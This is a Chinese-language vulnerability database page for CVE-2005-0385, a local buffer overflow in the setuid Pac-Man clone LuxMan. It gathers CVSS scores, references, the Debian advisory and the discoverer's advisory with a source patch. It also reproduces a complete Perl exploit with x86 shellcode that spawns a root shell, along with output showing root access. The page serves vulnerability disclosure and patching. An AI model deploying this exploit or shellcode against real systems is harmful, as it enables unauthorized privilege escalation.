CVE-2005-0385
CVSS7.2
发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-10 15:35:28
NMCOEPS    

[原文]Buffer overflow in luxman before 0.41, if used with certain insecure svgalib libraries, allows local users to execute arbitrary code via a long -f command line argument.


[CNNVD]LuxMan本地缓冲区溢出漏洞(CNNVD-200505-299)

        luxman 0.41之前的版本,如果与某些不安全的svgalib库使用,其存在的缓冲区溢出漏洞允许本地用户通过较长的-f命令行参数来执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:frank_mcingvale:luxman:0.41_17
cpe:/a:frank_mcingvale:luxman:0.41

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0385
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0385
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-299
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/12797
(PATCH)  BID  12797
http://xforce.iss.net/xforce/xfdb/19680
(UNKNOWN)  XF  luxman-bo-execute-commands(19680)
http://www.securityfocus.com/archive/1/393195/2005-03-13/2005-03-19/0
(UNKNOWN)  BUGTRAQ  20050314 DMA[2005-0310a] - 'Frank McIngvale LuxMan buffer overflow'
http://www.digitalmunition.com/DMA%5B2005-0310a%5D.txt
(UNKNOWN)  MISC  http://www.digitalmunition.com/DMA[2005-0310a].txt
http://www.debian.org/security/2005/dsa-693
(VENDOR_ADVISORY)  DEBIAN  DSA-693
http://secunia.com/advisories/14582
(VENDOR_ADVISORY)  SECUNIA  14582

- 漏洞信息

LuxMan本地缓冲区溢出漏洞
高危 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
本地  
        luxman 0.41之前的版本,如果与某些不安全的svgalib库使用,其存在的缓冲区溢出漏洞允许本地用户通过较长的-f命令行参数来执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://security.debian.org/pool/updates/main/l/luxman/luxman_0.41-17.2_i386.deb

- 漏洞信息 (877)

Frank McIngvale LuxMan 0.41 Local Buffer Overflow Exploit (EDBID:877)
linux local
2005-03-14 Verified
0 Kevin Finisterre
N/A [点击下载]
#!/usr/bin/perl -w
#
# luxman exploit
#
# ii  luxman         0.41-19.1      Pac-Man clone (svgalib based)
#
# Tested with "security compat" set in /etc/vga/libvga.config on debian unstable 3.1
#
# kfinisterre@jdam:~$ ./luxman_ex.pl
# LuxMan v0.41, Copyright (c) 1995 Frank McIngvale
# LuxMan comes with ABSOLUTELY NO WARRANTY; see COPYING for details.
# 
# You must be the owner of the current console to use svgalib.
# Not running in a graphics capable console,
# and unable to find one.
# Using SIS driver, 2048KB. Chiptype=8
# svgalib 1.4.3
# You must be the owner of the current console to use svgalib.
# Not running in a graphics capable console,
# and unable to find one.
# svgalib: Failed to initialize mouse.
# 
# The frame rate is now set to 1 frames per second.
# If the game seems too fast, too slow, or too jerky,
# you can adjust this value the `-r' option.
# 
# Calibrating delay...-664257
# Sound server started [pid:7082]
# sh-2.05b# id
# uid=0(root) gid=1000(kfinisterre) groups=1000(kfinisterre)
#

($offset) = @ARGV,$offset || ($offset = 0);

$sc  = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";

$ENV{"FOO"} = $sc;

$buf = "A" x 8732;
$buf .= (pack("l",(0xbfffffff-512+$offset)) x2);

#exec("strace -u kfinisterre /usr/games/luxman -r 1 -f $buf");
exec("/usr/games/luxman -r 1 -f $buf");

# milw0rm.com [2005-03-14]
		

- 漏洞信息 (F36632)

luxman_ex2.pl (PacketStormID:F36632)
2005-03-17 00:00:00
Kevin Finisterre  digitalmunition.com
exploit,overflow,local,root
CVE-2005-0385
[点击下载]

LuxMan 0.41-19.1 local root exploit that makes use of a buffer overflow.

- 漏洞信息 (F36631)

DMA-2005-0310a.txt (PacketStormID:F36631)
2005-03-17 00:00:00
Kevin Finisterre  digitalmunition.com
advisory,overflow,local,root
CVE-2005-0385
[点击下载]

LuxMan 0.41-19.1 is susceptible to local root compromise via a buffer overflow.

DMA[2005-0310a] - 'Frank McIngvale LuxMan buffer overflow'
Author: Kevin Finisterre
Vendor: frankm@nuance.com (broken)
Product: 'luxman'
References: (CAN-2005-0385)
http://www.digitalmunition.com/DMA[2005-0310a].txt 
http://www.debian.org/security/2005/dsa-693

Description: 
LuxMan is a Pac-Man clone for SVGALIB. It includes color, sound, several 
different levels, and difficulty settings. LuxMan also comes with tools 
for making your own levels and customizing the game. Woohoo! Lets chomp
some power pellets! I've got pacman fever folks. 

The following statement from http://packages.debian.org/stable/games/luxman
led me to audit this package:

"WARNING: This package CONTAINS SETUID ROOT BINARIES. This is a possible
SECURITY RISK. I don't want to tell you not to afraid, but this package is 
in Debian since 4 years w/o problems."

Be afraid! Shiver and quake in your boots! Well not really... the author 
did a pretty good job at preventing "potential" exploits from happening. 
(hp is rubbing off on me). The snippet below is taken from  a file included
in the luxman_0.41.orig.tar.gz called README.Security:

----------- snip -----------

[This is perhaps overly cautious of me, but I'd rather be safe.]

LuxMan, like all other programs which use `svgalib', runs
setuid-root. That is, when it starts running, it is running
with root privileges. This means that it could delete all the files
on your hard drive, etc., if it wanted to.

The VERY FIRST thing the program does (after printing a copyright
notice) is to call vga_init(). `vga_init()' is an svgalib routine
which initializes the VGA card and gives up root privileges.

LuxMan NEVER attempts to regain root privileges after this point.

----------- snip -----------

As I stated above the author did a good job at limiting the impact of this
bug. By making a call to vga_init() this bug is pretty much curbed. vga_init() 
detects the chipset and gives up supervisor rights immediately. 

If we plan to exploit this bug we pretty much only have two options... hope that
the machine is running a super old school version of sgvalib or cross your fingers
for 'security compat' in the config file. If you have neither of these you are
pretty much S.O.L., unless you have some other technique for bypassing vga_init(). 

Svgalib versions prior to 1.2.11 had a security hole where it would be possible 
to regain root privileges even after a vga_init() call. Some programs may 
(accidently) rely on the old vga_init behaviour (which was probably due to the 
author not knowing about saved uids (which might actually even not have existed in
Linux at that time)). Because of this svgalib includes the option to revert back
to the old behavior. Placing 'security compat' in /etc/vga/libvga.conf or on 
debian /etc/vga/libvga.config will reinstate the old behavior. 

If either of the above conditions are met exploitation can be done as shown below. 

By providing an overly long argument to the '-f' option a fixed buffer will be 
overflown and if you were lucky you get a root shell. 

kfinisterre@kfinisterre01:~$ id
uid=1000(kfinisterre) gid=1000(kfinisterre) groups=1000(kfinisterre)

kfinisterre@kfinisterre01:~$ ./luxman_ex2.pl
LuxMan v0.41, Copyright (c) 1995 Frank McIngvale
LuxMan comes with ABSOLUTELY NO WARRANTY; see COPYING for details.

You must be the owner of the current console to use svgalib.
Not running in a graphics capable console,
and unable to find one.
Using EGA driver.
svgalib 1.4.3
You must be the owner of the current console to use svgalib.
Not running in a graphics capable console,
and unable to find one.

The frame rate is now set to 1 frames per second.
If the game seems too fast, too slow, or too jerky,
you can adjust this value the `-r' option.

Calibrating delay...-666626
Sound server started [pid:15233]
sh-2.05b# id
uid=0(root) gid=1000(kfinisterre) groups=1000(kfinisterre)


To fix this vulnerability modify util.cc as follows or do an 'apt-get update' if
you are on Debian. 

--- luxman-0.41/gtools/util.cc-orig     Wed Mar  9 20:18:58 2005
+++ luxman-0.41/gtools/util.cc  Wed Mar  9 22:21:31 2005
@@ -295,6 +295,9 @@
   if ( !strlen( basename ) )
        return 0;

+  if ( strlen( basename ) > NAME_MAX )
+        return 0;
+
   /* Try basename */
   if ( resolve_tilde( bname, basename ) == NULL )
        return 0;

Timeline associated with this bug:
03/09/05 Contacted ocsi@debian.org and security@debian.org
03/09/05 Bug verified by Steve Kemp
03/10/05 Joey@infodrom.org provides CVE ID
03/14/05 Debian [DSA 693-1] released to address this issue
    

- 漏洞信息 (F36630)

dsa-693.txt (PacketStormID:F36630)
2005-03-17 00:00:00
 
advisory,overflow,arbitrary,root
linux,debian
CVE-2005-0385
[点击下载]

Debian Security Advisory 693-1 - Kevin Finisterre discovered a buffer overflow in luxman, an SVGA based PacMan clone, that could lead to the execution of arbitrary commands as root.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 693-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
March 14, 2005                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : luxman
Vulnerability  : buffer overflow
Problem-Type   : local
Debian-specific: no
CVE ID         : CAN-2005-0385

Kevin Finisterre discovered a buffer overflow in luxman, an SVGA based
PacMan clone, that could lead to the execution of arbitrary commands
as root.

For the stable distribution (woody) this problem has been fixed in
version 0.41-17.2.

For the unstable distribution (sid) this problem has been fixed in
version 0.41-20.

We recommend that you upgrade your luxman package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/l/luxman/luxman_0.41-17.2.dsc
      Size/MD5 checksum:      570 a55086f936bbcfe22598ac0aeb94f8da
    http://security.debian.org/pool/updates/main/l/luxman/luxman_0.41-17.2.diff.gz
      Size/MD5 checksum:     7105 8719173e012bab5680d138d25e30b619
    http://security.debian.org/pool/updates/main/l/luxman/luxman_0.41.orig.tar.gz
      Size/MD5 checksum:   268279 aa389327578e2d65f3f5035193e407cb

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/l/luxman/luxman_0.41-17.2_i386.deb
      Size/MD5 checksum:   290762 c4123222e992a37dcf609768a20e7e8f


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)

iD8DBQFCNbpiW5ql+IAeqTIRAhtSAJ0d3a6I8wMPZUxKMaOGXtd5oZ7MJgCeI3NF
FIFFNlRq/R/T9Qs2asyHLSo=
=NXet
-----END PGP SIGNATURE-----

    

- 漏洞信息

14774
LuxMan luxman -f Parameter Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-03-14 Unknow
2005-03-14 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

LuxMan Local Buffer Overflow Vulnerability
Boundary Condition Error 12797
No Yes
2005-03-14 12:00:00 2009-07-12 10:56:00
Discovery is credited to Kevin Finisterre.

- 受影响的程序版本

Frank McIngvale LuxMan 0.41 -17
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Frank McIngvale LuxMan 0.41
+ Debian Linux 3.0 ia-32

- 漏洞讨论

LuxMan is reported prone to a local buffer overflow vulnerability.

A successful attack, can allow an attacker to gain elevated privileges on a vulnerable computer.

LuxMan 0.41-17 is reported prone to this vulnerability. It is possible that other versions are affected as well.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

Debian has released advisory DSA 693-1 to address this issue. Please see the referenced advisory for more information.


Frank McIngvale LuxMan 0.41 -17

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站